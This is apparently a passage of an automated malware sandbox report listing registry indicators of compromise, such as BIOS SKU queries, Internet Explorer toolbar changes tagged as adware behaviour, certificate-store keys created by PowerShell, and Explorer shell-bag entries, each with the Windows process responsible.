sc.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedllhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exereg.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	sc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dllhost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	DllHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	cmd.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	cmd.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	cmd.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEpowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exeExplorer.EXEbackgroundTaskHost.exesihost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Cifrado del dispositivo"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000000000000010004170704461746100400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000016000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "Sistema"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "Conexión de RemoteApp y Escritorio"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Opciones de Internet"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Reconocimiento de voz"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Administración del color"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Administrador de credenciales"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recuperación"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Opciones de indización"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Firewall de Windows Defender"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e00000014000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\MuiCache	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Programas predeterminados"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Teléfono y módem"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
